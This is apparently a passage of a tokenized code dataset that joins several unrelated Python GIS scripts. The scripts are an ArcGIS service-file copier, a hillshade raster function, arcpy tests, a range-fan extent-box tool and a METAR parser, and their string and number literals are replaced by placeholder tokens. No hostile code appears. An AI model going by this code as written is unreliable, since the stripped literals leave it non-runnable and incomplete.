'<STR_LIT:path>' ] <EOL> sdFile = os . path . basename ( sdFilePath ) <EOL> sdParentFolder = os . path . basename ( os . path . dirname ( sdFilePath ) ) <EOL> outputFolder = os . path . join ( targetFolder , sdParentFolder ) <EOL> outputFilePath = os . path . join ( outputFolder , sdFile ) <EOL> print '<STR_LIT>' . format ( service , '<STR_LIT:|>' , '<STR_LIT>' + sdFilePath ) <EOL> print '<STR_LIT>' . format ( '<STR_LIT:|>' , '<STR_LIT>' + outputFilePath ) <EOL> if not os . path . exists ( outputFolder ) : <EOL> os . makedirs ( outputFolder ) <EOL> copy2 ( sdFilePath , outputFilePath ) <EOL> os . chdir ( outputFolder ) <EOL> serviceInfo = agsServices [ service ] <EOL> json . dump ( serviceInfo , open ( os . path . splitext ( sdFile ) [ <NUM_LIT:0> ] + '<STR_LIT>' , '<STR_LIT:w>' ) ) <EOL> props = portalProps [ service ] <EOL> json . dump ( props , open ( os . path . splitext ( sdFile ) [ <NUM_LIT:0> ] + '<STR_LIT>' , '<STR_LIT:w>' ) ) <EOL> print sectionBreak <EOL> def getPortalPropsForServices ( portal , agsServices ) : <EOL> allServicesProps = None <EOL> if not agsServices : <EOL> return None <EOL> allServicesProps = { } <EOL> for service , info in agsServices . iteritems ( ) : <EOL> allTags = [ ] <EOL> props = info . get ( '<STR_LIT>' ) <EOL> if props : <EOL> outProps = copy . deepcopy ( props ) <EOL> portalItems = props [ '<STR_LIT>' ] <EOL> print '<STR_LIT:->' * <NUM_LIT> <EOL> for i in range ( len ( portalItems ) ) : <EOL> itemID = portalItems [ i ] [ '<STR_LIT>' ] <EOL> itemType = portalItems [ i ] [ '<STR_LIT:type>' ] <EOL> item = portal . item ( itemID ) <EOL> if not item : <EOL> outProps [ '<STR_LIT>' ] [ i ] [ '<STR_LIT>' ] = False <EOL> print '<STR_LIT>' + service + '<STR_LIT>' + itemID + '<STR_LIT>' + itemType + '<STR_LIT>' <EOL> outProps [ '<STR_LIT>' ] [ i ] [ '<STR_LIT>' ] = None <EOL> outProps [ '<STR_LIT>' ] [ i ] [ '<STR_LIT>' ] = None <EOL> outProps [ '<STR_LIT>' ] [ i ] [ '<STR_LIT>' ] = None <EOL> continue <EOL> else : <EOL> groups = [ ] <EOL> outProps [ '<STR_LIT>' ] [ i ] [ '<STR_LIT>' ] = True <EOL> print '<STR_LIT>' + service + '<STR_LIT>' + itemID + '<STR_LIT>' + itemType + '<STR_LIT:)>' <EOL> item_info , item_sharing , item_folder_id = portal . user_item ( itemID ) <EOL> outProps [ '<STR_LIT>' ] [ i ] [ '<STR_LIT>' ] = item_info <EOL> outProps [ '<STR_LIT>' ] [ i ] [ '<STR_LIT>' ] = item_sharing <EOL> group_ids = item_sharing [ '<STR_LIT>' ] <EOL> for group_id in group_ids : <EOL> groups . append ( portal . group ( group_id ) ) <EOL> outProps [ '<STR_LIT>' ] [ i ] [ '<STR_LIT>' ] = groups <EOL> allServicesProps [ service ] = outProps <EOL> return allServicesProps <EOL> def getPortalTags ( portal , itemIDs ) : <EOL> '''<STR_LIT>''' <EOL> allTags = [ ] <EOL> for itemID in itemIDs : <EOL> tags = portal . item ( itemID ) . get ( '<STR_LIT>' ) <EOL> if tags : <EOL> allTags . extend ( tags ) <EOL> uniqueTags = list ( set ( allTags ) ) <EOL> if len ( uniqueTags ) == <NUM_LIT:0> : <EOL> uniqueTags = None <EOL> return uniqueTags <EOL> def report ( sdFiles , agsServices ) : <EOL> '''<STR_LIT>''' <EOL> sectionLen = <NUM_LIT> <EOL> totalNumServices = len ( agsServices . keys ( ) ) <EOL> totalNumSDFiles = len ( sdFiles . keys ( ) ) <EOL> totalNumMissingSDFiles = <NUM_LIT:0> <EOL> print '<STR_LIT>' + sectionBreak <EOL> print '<STR_LIT>' <EOL> print sectionBreak <EOL> print '<STR_LIT>' . format ( '<STR_LIT>' , '<STR_LIT:|>' , '<STR_LIT>' ) <EOL> print sectionBreak1 <EOL> for service in agsServices : <EOL> if service in sdFiles : <EOL> printLine = '<STR_LIT>' . format ( service , '<STR_LIT:|>' , sdFiles [ service ] [ '<STR_LIT:path>' ] ) <EOL> else : <EOL> totalNumMissingSDFiles = totalNumMissingSDFiles + <NUM_LIT:1> <EOL> printLine = '<STR_LIT>' . format ( service , '<STR_LIT:|>' , '<STR_LIT>' ) <EOL> print printLine <EOL> print sectionBreak1 <EOL> print '<STR_LIT>' <EOL> print '<STR_LIT>' . format ( '<STR_LIT>' , totalNumServices ) <EOL> print '<STR_LIT>' . format ( '<STR_LIT>' , totalNumSDFiles ) <EOL> if totalNumMissingSDFiles == <NUM_LIT:0> : <EOL> printLine = '<STR_LIT>' . format ( '<STR_LIT>' , totalNumMissingSDFiles ) <EOL> else : <EOL> printLine = '<STR_LIT>' . format ( '<STR_LIT>' , totalNumMissingSDFiles , '<STR_LIT>' ) <EOL> print printLine <EOL> print sectionBreak <EOL> def getItemsIDs ( portal , users ) : <EOL> ids = [ ] <EOL> for user in users : <EOL> q = '<STR_LIT>' + user <EOL> items = portal . search ( [ '<STR_LIT:id>' , '<STR_LIT:type>' , '<STR_LIT:url>' , '<STR_LIT:title>' , '<STR_LIT>' ] , q ) <EOL> if items : <EOL> for item in items : <EOL> if item . get ( '<STR_LIT:url>' ) : <EOL> ids . append ( item . get ( '<STR_LIT:id>' ) ) <EOL> if len ( ids ) == <NUM_LIT:0> : <EOL> ids = None <EOL> return ids <EOL> def main ( ) : <EOL> totalSuccess = True <EOL> if not os . path . exists ( sevenZipExePath ) : <EOL> print '<STR_LIT>' + sevenZipExePath + '<STR_LIT>' <EOL> sys . exit ( exitErrCode ) <EOL> results = check_args ( ) <EOL> if not results : <EOL> sys . exit ( exitErrCode ) <EOL> try : <EOL> server , port , adminuser , password , doCopy , targetFolder , users = results <EOL> if debug : <EOL> print server , port , adminuser , password , doCopy , targetFolder , users <EOL> uploadsFolderInfo = getServerDirectory ( server , port , adminuser , password , "<STR_LIT>" ) <EOL> sdRootFolder = os . path . join ( uploadsFolderInfo [ '<STR_LIT>' ] , '<STR_LIT>' ) <EOL> print '<STR_LIT>' + sdRootFolder + '<STR_LIT:\n>' <EOL> if not os . path . exists ( sdRootFolder ) : <EOL> print '<STR_LIT>' + sdRootFolder + '<STR_LIT>' <EOL> sys . exit ( exitErrCode ) <EOL> sdFiles = get_sd_files ( sdRootFolder ) <EOL> agsServices = get_ags_services ( server , port , adminuser , password ) <EOL> portal = Portal ( '<STR_LIT>' + server + '<STR_LIT>' , adminuser , password ) <EOL> props = getPortalPropsForServices ( portal , agsServices ) <EOL> userItemIDs = None <EOL> if users : <EOL> userItemIDs = getItemsIDs ( portal , users ) <EOL> sdFilesToCopy = filesToCopy ( sdFiles , agsServices , userItemIDs ) <EOL> if doCopy : <EOL> copySDFiles ( sdFilesToCopy , targetFolder , agsServices , props ) <EOL> report ( sdFilesToCopy , agsServices ) <EOL> print '<STR_LIT>' <EOL> except : <EOL> totalSuccess = False <EOL> tb = sys . exc_info ( ) [ <NUM_LIT:2> ] <EOL> tbinfo = traceback . format_tb ( tb ) [ <NUM_LIT:0> ] <EOL> pymsg = "<STR_LIT>" + tbinfo + "<STR_LIT>" + str ( sys . exc_info ( ) [ <NUM_LIT:1> ] ) <EOL> print <EOL> print "<STR_LIT>" <EOL> print pymsg + "<STR_LIT:\n>" <EOL> finally : <EOL> if totalSuccess : <EOL> sys . exit ( <NUM_LIT:0> ) <EOL> else : <EOL> sys . exit ( <NUM_LIT:1> ) <EOL> if __name__ == "<STR_LIT:__main__>" : <EOL> main ( ) </s>
<s> from scipy import ndimage <EOL> import numpy as np <EOL> import math <EOL> from utils import computeCellSize , Projection , isGeographic <EOL> class Hillshade ( ) : <EOL> def __init__ ( self ) : <EOL> self . name = "<STR_LIT>" <EOL> self . description = "<STR_LIT>" <EOL> self . prepare ( ) <EOL> self . proj = Projection ( ) <EOL> def getParameterInfo ( self ) : <EOL> return [ <EOL> { <EOL> '<STR_LIT:name>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT:value>' : None , <EOL> '<STR_LIT>' : True , <EOL> '<STR_LIT>' : "<STR_LIT>" , <EOL> '<STR_LIT:description>' : "<STR_LIT>" , <EOL> } , <EOL> { <EOL> '<STR_LIT:name>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT:value>' : <NUM_LIT:1.> , <EOL> '<STR_LIT>' : False , <EOL> '<STR_LIT>' : "<STR_LIT>" , <EOL> '<STR_LIT:description>' : ( "<STR_LIT>" <EOL> "<STR_LIT>" ) , <EOL> } , <EOL> { <EOL> '<STR_LIT:name>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT:value>' : <NUM_LIT> , <EOL> '<STR_LIT>' : False , <EOL> '<STR_LIT>' : "<STR_LIT>" , <EOL> '<STR_LIT:description>' : ( "<STR_LIT>" <EOL> "<STR_LIT>" ) , <EOL> } , <EOL> { <EOL> '<STR_LIT:name>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT:value>' : <NUM_LIT> , <EOL> '<STR_LIT>' : False , <EOL> '<STR_LIT>' : "<STR_LIT>" , <EOL> '<STR_LIT:description>' : ( "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" ) , <EOL> } , <EOL> ] <EOL> def getConfiguration ( self , ** scalars ) : <EOL> return { <EOL> '<STR_LIT>' : ( <NUM_LIT:0> , ) , <EOL> '<STR_LIT>' : <NUM_LIT:4> | <NUM_LIT:8> , <EOL> '<STR_LIT>' : <NUM_LIT:2> | <NUM_LIT:4> | <NUM_LIT:8> , <EOL> '<STR_LIT>' : <NUM_LIT:1> , <EOL> '<STR_LIT>' : True <EOL> } <EOL> def updateRasterInfo ( self , ** kwargs ) : <EOL> kwargs [ '<STR_LIT>' ] [ '<STR_LIT>' ] = <NUM_LIT:1> <EOL> kwargs [ '<STR_LIT>' ] [ '<STR_LIT>' ] = '<STR_LIT>' <EOL> kwargs [ '<STR_LIT>' ] [ '<STR_LIT>' ] = ( { '<STR_LIT>' : <NUM_LIT:0.> , '<STR_LIT>' : <NUM_LIT> } , ) <EOL> kwargs [ '<STR_LIT>' ] [ '<STR_LIT>' ] = ( ) <EOL> kwargs [ '<STR_LIT>' ] [ '<STR_LIT>' ] = False <EOL> kwargs [ '<STR_LIT>' ] [ '<STR_LIT>' ] = ( ) <EOL> r = kwargs [ '<STR_LIT>' ] <EOL> if r [ '<STR_LIT>' ] > <NUM_LIT:1> : <EOL> raise Exception ( "<STR_LIT>" ) <EOL> self . prepare ( zFactor = kwargs . get ( '<STR_LIT>' , <NUM_LIT:1.> ) , <EOL> cellSizeExponent = kwargs . get ( '<STR_LIT>' , <NUM_LIT> ) , <EOL> cellSizeFactor = kwargs . get ( '<STR_LIT>' , <NUM_LIT> ) , <EOL> sr = r [ '<STR_LIT>' ] ) <EOL> return kwargs <EOL> def updatePixels ( self , tlc , shape , props , ** pixelBlocks ) : <EOL> v = np . array ( pixelBlocks [ '<STR_LIT>' ] , dtype = '<STR_LIT>' , copy = False ) <EOL> m = np . array ( pixelBlocks [ '<STR_LIT>' ] , dtype = '<STR_LIT>' , copy = False ) <EOL> dx , dy = self . computeGradients ( v , props ) <EOL> outBlock = self . computeHillshade ( dx , dy ) <EOL> pixelBlocks [ '<STR_LIT>' ] = outBlock [ <NUM_LIT:1> : - <NUM_LIT:1> , <NUM_LIT:1> : - <NUM_LIT:1> ] . astype ( props [ '<STR_LIT>' ] , copy = False ) <EOL> pixelBlocks [ '<STR_LIT>' ] = m [ : - <NUM_LIT:2> , : - <NUM_LIT:2> ] & m [ <NUM_LIT:1> : - <NUM_LIT:1> , : - <NUM_LIT:2> ] & m [ <NUM_LIT:2> : , : - <NUM_LIT:2> ] & m [ : - <NUM_LIT:2> , <NUM_LIT:1> : - <NUM_LIT:1> ] & m [ <NUM_LIT:1> : - <NUM_LIT:1> , <NUM_LIT:1> : - <NUM_LIT:1> ] & m [ <NUM_LIT:2> : , <NUM_LIT:1> : - <NUM_LIT:1> ] & m [ : - <NUM_LIT:2> , <NUM_LIT:2> : ] & m [ <NUM_LIT:1> : - <NUM_LIT:1> , <NUM_LIT:2> : ] & m [ <NUM_LIT:2> : , <NUM_LIT:2> : ] <EOL> return pixelBlocks <EOL> def updateKeyMetadata ( self , names , bandIndex , ** keyMetadata ) : <EOL> if bandIndex == - <NUM_LIT:1> : <EOL> keyMetadata [ '<STR_LIT>' ] = '<STR_LIT>' <EOL> elif bandIndex == <NUM_LIT:0> : <EOL> keyMetadata [ '<STR_LIT>' ] = None <EOL> keyMetadata [ '<STR_LIT>' ] = None <EOL> keyMetadata [ '<STR_LIT>' ] = '<STR_LIT>' <EOL> return keyMetadata <EOL> def prepare ( self , azimuth = <NUM_LIT> , elevation = <NUM_LIT> , zFactor = <NUM_LIT:1.> , cellSizeExponent = <NUM_LIT> , cellSizeFactor = <NUM_LIT> , sr = None ) : <EOL> Z = ( <NUM_LIT> - elevation ) * math . pi / <NUM_LIT> <EOL> A = ( <NUM_LIT> - azimuth ) * math . pi / <NUM_LIT> <EOL> sinZ = math . sin ( Z ) <EOL> self . cosZ = math . cos ( Z ) <EOL> self . sinZsinA = sinZ * math . sin ( A ) <EOL> self . sinZcosA = sinZ * math . cos ( A ) <EOL> self . xKernel = [ [ <NUM_LIT:1> , <NUM_LIT:0> , - <NUM_LIT:1> ] , [ <NUM_LIT:2> , <NUM_LIT:0> , - <NUM_LIT:2> ] , [ <NUM_LIT:1> , <NUM_LIT:0> , - <NUM_LIT:1> ] ] <EOL> self . yKernel = [ [ <NUM_LIT:1> , <NUM_LIT:2> , <NUM_LIT:1> ] , [ <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT:0> ] , [ - <NUM_LIT:1> , - <NUM_LIT:2> , - <NUM_LIT:1> ] ] <EOL> self . zf = zFactor <EOL> self . ce = cellSizeExponent <EOL> self . cf = cellSizeFactor <EOL> self . sr = sr <EOL> def computeGradients ( self , pixelBlock , props ) : <EOL> p = props [ '<STR_LIT>' ] if self . sr is None else computeCellSize ( props , self . sr , self . proj ) <EOL> if p is not None and len ( p ) == <NUM_LIT:2> : <EOL> p = np . multiply ( p , <NUM_LIT> if isGeographic ( props [ '<STR_LIT>' ] ) else <NUM_LIT:1.> ) <EOL> xs , ys = ( self . zf + ( np . power ( p , self . ce ) * self . cf ) ) / ( <NUM_LIT:8> * p ) <EOL> else : <EOL> xs , ys = <NUM_LIT:1.> , <NUM_LIT:1.> <EOL> return ( ndimage . convolve ( pixelBlock , self . xKernel ) * xs , ndimage . convolve ( pixelBlock , self . yKernel ) * ys ) <EOL> def computeHillshade ( self , dx , dy ) : <EOL> return np . clip ( <NUM_LIT:255> * ( self . cosZ + dy * self . sinZsinA - dx * self . sinZcosA ) / np . sqrt ( <NUM_LIT:1.> + ( dx * dx + dy * dy ) ) , <NUM_LIT:0.> , <NUM_LIT> ) <EOL> """<STR_LIT>""" </s>
<s> import arcpy <EOL> import os <EOL> currentPath = os . path . dirname ( __file__ ) <EOL> geodatabasePath = os . path . normpath ( os . path . join ( currentPath , r"<STR_LIT>" ) ) <EOL> scratchPath = geodatabasePath <EOL> toolboxesPath = os . path . normpath ( os . path . join ( currentPath , r"<STR_LIT>" ) ) <EOL> cibSourcePath = os . path . normpath ( os . path . join ( currentPath , r"<STR_LIT>" ) ) <EOL> scratchGDB = os . path . join ( scratchPath , "<STR_LIT>" ) <EOL> toolbox = os . path . join ( toolboxesPath , "<STR_LIT>" ) <EOL> def createScratch ( ) : <EOL> try : <EOL> arcpy . CreateFileGDB_management ( scratchPath , "<STR_LIT>" ) <EOL> except : <EOL> print ( "<STR_LIT>" ) <EOL> return <EOL> def deleteScratch ( ) : <EOL> try : <EOL> arcpy . Delete_management ( scratchGDB ) <EOL> except : <EOL> print ( "<STR_LIT>" ) <EOL> return <EOL> createScratch ( ) </s>
<s> import arcpy <EOL> import os <EOL> import sys <EOL> import traceback <EOL> import TestUtilities <EOL> def RunTest ( ) : <EOL> try : <EOL> arcpy . AddMessage ( "<STR_LIT>" ) <EOL> inputGpxFile = TestUtilities . gpxFile <EOL> outputPointsFC = os . path . join ( TestUtilities . outputGDB , "<STR_LIT>" ) <EOL> toolbox = TestUtilities . toolbox <EOL> print ( "<STR_LIT>" + str ( TestUtilities . currentPath ) ) <EOL> print ( "<STR_LIT>" + str ( TestUtilities . geodatabasePath ) ) <EOL> arcpy . env . overwriteOutput = True <EOL> arcpy . ImportToolbox ( toolbox , "<STR_LIT>" ) <EOL> arcpy . GPX2Layer_pdc ( inputGpxFile , outputPointsFC ) <EOL> outputFeatureCount = int ( arcpy . GetCount_management ( outputPointsFC ) . getOutput ( <NUM_LIT:0> ) ) <EOL> print ( "<STR_LIT>" + str ( outputPointsFC ) ) <EOL> print ( "<STR_LIT>" + str ( outputFeatureCount ) ) <EOL> if ( outputFeatureCount < <NUM_LIT:1> ) : <EOL> print ( "<STR_LIT>" + str ( outputFeatureCount ) ) <EOL> raise Exception ( "<STR_LIT>" ) <EOL> print ( "<STR_LIT>" ) <EOL> except arcpy . ExecuteError : <EOL> msgs = arcpy . GetMessages ( ) <EOL> arcpy . AddError ( msgs ) <EOL> sys . exit ( - <NUM_LIT:1> ) <EOL> except Exception as e : <EOL> tb = sys . exc_info ( ) [ <NUM_LIT:2> ] <EOL> tbinfo = traceback . format_tb ( tb ) [ <NUM_LIT:0> ] <EOL> pymsg = "<STR_LIT>" + tbinfo + "<STR_LIT>" + str ( sys . exc_info ( ) [ <NUM_LIT:1> ] ) <EOL> msgs = "<STR_LIT>" + arcpy . GetMessages ( ) + "<STR_LIT:\n>" <EOL> arcpy . AddError ( pymsg ) <EOL> arcpy . AddError ( msgs ) <EOL> sys . exit ( - <NUM_LIT:1> ) <EOL> RunTest ( ) </s>
<s> </s>
<s> import os , sys , math , traceback <EOL> import arcpy <EOL> from arcpy import env <EOL> from arcpy import da <EOL> deleteme = [ ] <EOL> debug = False <EOL> inputFeatures = arcpy . GetParameterAsText ( <NUM_LIT:0> ) <EOL> outputExtentBoxes = arcpy . GetParameterAsText ( <NUM_LIT:1> ) <EOL> outputWeaponPositions = arcpy . GetParameterAsText ( <NUM_LIT:2> ) <EOL> GCS_WGS_1984 = arcpy . SpatialReference ( r"<STR_LIT>" ) <EOL> def Geo2Arithmetic ( inAngle ) : <EOL> outAngle = - <NUM_LIT:1.0> <EOL> if ( inAngle > <NUM_LIT> ) : <EOL> inAngle = math . fmod ( inAngle , <NUM_LIT> ) <EOL> if inAngle == <NUM_LIT> : inAngle = <NUM_LIT:0.0> <EOL> if ( inAngle >= <NUM_LIT:0.0> and inAngle <= <NUM_LIT> ) : <EOL> outAngle = math . fabs ( inAngle - <NUM_LIT> ) <EOL> if ( inAngle > <NUM_LIT> and inAngle < <NUM_LIT> ) : <EOL> outAngle = <NUM_LIT> - ( inAngle - <NUM_LIT> ) <EOL> return outAngle <EOL> try : <EOL> inputFeaturesDesc = arcpy . Describe ( inputFeatures ) <EOL> inputFeaturesShapeName = inputFeaturesDesc . shapeFieldName <EOL> inputFeaturesOID = inputFeaturesDesc . oidFieldName <EOL> inputFeatureSR = inputFeaturesDesc . spatialReference <EOL> scratch = env . scratchWorkspace <EOL> outputExtentBoxes = arcpy . CreateFeatureclass_management ( os . path . dirname ( outputExtentBoxes ) , os . path . basename ( outputExtentBoxes ) , "<STR_LIT>" , "<STR_LIT:#>" , "<STR_LIT>" , "<STR_LIT>" , inputFeatureSR ) <EOL> arcpy . AddField_management ( outputExtentBoxes , "<STR_LIT>" , "<STR_LIT>" ) <EOL> arcpy . AddField_management ( outputExtentBoxes , "<STR_LIT>" , "<STR_LIT>" ) <EOL> arcpy . AddField_management ( outputExtentBoxes , "<STR_LIT>" , "<STR_LIT>" ) <EOL> arcpy . AddField_management ( outputExtentBoxes , "<STR_LIT>" , "<STR_LIT>" ) <EOL> arcpy . AddField_management ( outputExtentBoxes , "<STR_LIT>" , "<STR_LIT>" ) <EOL> arcpy . AddField_management ( outputExtentBoxes , "<STR_LIT>" , "<STR_LIT>" ) <EOL> arcpy . AddField_management ( outputExtentBoxes , "<STR_LIT>" , "<STR_LIT>" ) <EOL> arcpy . AddField_management ( outputExtentBoxes , "<STR_LIT>" , "<STR_LIT>" ) <EOL> outputExtentBoxesOID = arcpy . Describe ( outputExtentBoxes ) . oidFieldName <EOL> searchRows = arcpy . da . SearchCursor ( inputFeatures , [ "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" ] ) <EOL> writeRows = arcpy . da . InsertCursor ( outputExtentBoxes , [ "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" ] ) <EOL> for currentRead in searchRows : <EOL> currentReadID = currentRead [ <NUM_LIT:0> ] <EOL> arcpy . AddMessage ( "<STR_LIT>" + str ( currentReadID ) ) <EOL> partCoordList = [ ] <EOL> for part in currentRead [ <NUM_LIT:1> ] : <EOL> for pnt in part : <EOL> partCoordList . append ( arcpy . Point ( pnt . X , pnt . Y ) ) <EOL> startPoint = partCoordList [ <NUM_LIT:0> ] <EOL> secondPoint = partCoordList [ <NUM_LIT:1> ] <EOL> n2Point = partCoordList [ len ( partCoordList ) - <NUM_LIT:2> ] <EOL> fanRange = currentRead [ <NUM_LIT:3> ] <EOL> width = math . sqrt ( math . pow ( secondPoint . X - n2Point . X , <NUM_LIT:2> ) + math . pow ( secondPoint . Y - n2Point . Y , <NUM_LIT:2> ) ) <EOL> halfWidth = width / <NUM_LIT> <EOL> if debug == True : arcpy . AddMessage ( "<STR_LIT>" + str ( fanRange ) + "<STR_LIT:U+002C>" + str ( width ) ) <EOL> bearing = currentRead [ <NUM_LIT:2> ] <EOL> leftAz = currentRead [ <NUM_LIT:4> ] <EOL> rightAz = currentRead [ <NUM_LIT:5> ] <EOL> bearingDegrees = bearing <EOL> backBearing = <NUM_LIT:0.0> <EOL> if bearing < <NUM_LIT> : <EOL> backBearing = <NUM_LIT> + ( bearing - <NUM_LIT> ) <EOL> else : <EOL> backBearing = bearing - <NUM_LIT> <EOL> leftBearing = <NUM_LIT:0.0> <EOL> if bearing < <NUM_LIT> : <EOL> leftBearing = <NUM_LIT> + ( bearing - <NUM_LIT> ) <EOL> else : <EOL> leftBearing = bearing - <NUM_LIT> <EOL> rightBearing = <NUM_LIT:0.0> <EOL> if bearing > <NUM_LIT> : <EOL> rightBearing = math . fabs ( <NUM_LIT> - ( bearing + <NUM_LIT> ) ) <EOL> else : <EOL> rightBearing = bearing + <NUM_LIT> <EOL> if debug == True : arcpy . AddMessage ( "<STR_LIT>" + str ( bearing ) + "<STR_LIT:U+002C>" + str ( leftBearing ) + "<STR_LIT:U+002C>" + str ( rightBearing ) + "<STR_LIT:U+002C>" + str ( backBearing ) ) <EOL> boxArray = arcpy . Array ( ) <EOL> llX = startPoint . X + ( halfWidth * math . cos ( math . radians ( Geo2Arithmetic ( leftBearing ) ) ) ) <EOL> llY = startPoint . Y + ( halfWidth * math . sin ( math . radians ( Geo2Arithmetic ( leftBearing ) ) ) ) <EOL> llPoint = arcpy . Point ( llX , llY ) <EOL> boxArray . add ( llPoint ) <EOL> ulX = llPoint . X + ( fanRange * math . cos ( math . radians ( Geo2Arithmetic ( bearing ) ) ) ) <EOL> ulY = llPoint . Y + ( fanRange * math . sin ( math . radians ( Geo2Arithmetic ( bearing ) ) ) ) <EOL> ulPoint = arcpy . Point ( ulX , ulY ) <EOL> boxArray . add ( ulPoint ) <EOL> urX = ulPoint . X + ( width * math . cos ( math . radians ( Geo2Arithmetic ( rightBearing ) ) ) ) <EOL> urY = ulPoint . Y + ( width * math . sin ( math . radians ( Geo2Arithmetic ( rightBearing ) ) ) ) <EOL> urPoint = arcpy . Point ( urX , urY ) <EOL> boxArray . add ( urPoint ) <EOL> lrX = urPoint . X + ( fanRange * math . cos ( math . radians ( Geo2Arithmetic ( backBearing ) ) ) ) <EOL> lrY = urPoint . Y + ( fanRange * math . sin ( math . radians ( Geo2Arithmetic ( backBearing ) ) ) ) <EOL> lrPoint = arcpy . Point ( lrX , lrY ) <EOL> boxArray . add ( lrPoint ) <EOL> boxArray . add ( llPoint ) <EOL> boxPolygon = arcpy . Polygon ( boxArray ) <EOL> writeRows . insertRow ( [ boxPolygon , currentReadID , bearing , fanRange , width , leftAz , rightAz , startPoint . X , startPoint . Y ] ) <EOL> del searchRows <EOL> del writeRows <EOL> arcpy . AddMessage ( "<STR_LIT>" ) <EOL> arcpy . MakeXYEventLayer_management ( outputExtentBoxes , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , inputFeatureSR ) <EOL> arcpy . CopyFeatures_management ( "<STR_LIT>" , outputWeaponPositions ) <EOL> tempGeoPoints = os . path . join ( scratch , "<STR_LIT>" ) <EOL> deleteme . append ( tempGeoPoints ) <EOL> arcpy . Project_management ( outputWeaponPositions , tempGeoPoints , GCS_WGS_1984 ) <EOL> arcpy . AddXY_management ( tempGeoPoints ) <EOL> tempCCNPoints = os . path . join ( "<STR_LIT>" , "<STR_LIT>" ) <EOL> deleteme . append ( tempCCNPoints ) <EOL> arcpy . ConvertCoordinateNotation_management ( tempGeoPoints , tempCCNPoints , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , GCS_WGS_1984 ) <EOL> arcpy . JoinField_management ( outputWeaponPositions , "<STR_LIT>" , tempCCNPoints , "<STR_LIT>" , [ "<STR_LIT>" ] ) <EOL> arcpy . SetParameter ( <NUM_LIT:1> , outputExtentBoxes ) <EOL> arcpy . SetParameter ( <NUM_LIT:2> , outputWeaponPositions ) <EOL> except arcpy . ExecuteError : <EOL> msgs = arcpy . GetMessages ( ) <EOL> arcpy . AddError ( msgs ) <EOL> print msgs <EOL> except : <EOL> tb = sys . exc_info ( ) [ <NUM_LIT:2> ] <EOL> tbinfo = traceback . format_tb ( tb ) [ <NUM_LIT:0> ] <EOL> pymsg = "<STR_LIT>" + tbinfo + "<STR_LIT>" + str ( sys . exc_info ( ) [ <NUM_LIT:1> ] ) <EOL> msgs = "<STR_LIT>" + arcpy . GetMessages ( ) + "<STR_LIT:\n>" <EOL> arcpy . AddError ( pymsg ) <EOL> arcpy . AddError ( msgs ) <EOL> print pymsg + "<STR_LIT:\n>" <EOL> print msgs <EOL> finally : <EOL> if debug == True : arcpy . AddMessage ( "<STR_LIT>" ) <EOL> for i in deleteme : <EOL> if debug == True : arcpy . AddMessage ( "<STR_LIT>" + str ( i ) ) <EOL> arcpy . Delete_management ( i ) <EOL> if debug == True : arcpy . AddMessage ( "<STR_LIT>" ) </s>
<s> import ALFlib , os , sys , tempfile , time , urllib2 <EOL> from datetime import datetime <EOL> from datetime import timedelta <EOL> class MetarReader ( object ) : <EOL> """<STR_LIT>""" <EOL> version = "<STR_LIT>" <EOL> obsType = { <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' <EOL> } <EOL> equipment = { <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' <EOL> } <EOL> direction = ALFlib . Constants . TrueNorth <EOL> tendency = { <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT:D>' : '<STR_LIT>' , <EOL> '<STR_LIT:N>' : '<STR_LIT>' <EOL> } <EOL> pressureTendency = { <EOL> '<STR_LIT:0>' : '<STR_LIT>' , <EOL> '<STR_LIT:1>' : '<STR_LIT>' , <EOL> '<STR_LIT:2>' : '<STR_LIT>' , <EOL> '<STR_LIT:3>' : '<STR_LIT>' , <EOL> '<STR_LIT:4>' : '<STR_LIT>' , <EOL> '<STR_LIT:5>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' <EOL> } <EOL> qualifier = { <EOL> '<STR_LIT:M>' : '<STR_LIT:<>' , <EOL> '<STR_LIT:P>' : '<STR_LIT:>>' <EOL> } <EOL> intensity = { <EOL> '<STR_LIT:->' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT:+>' : '<STR_LIT>' <EOL> } <EOL> proximity = { <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' <EOL> } <EOL> descriptor = { <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' <EOL> } <EOL> conjunction = { <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> 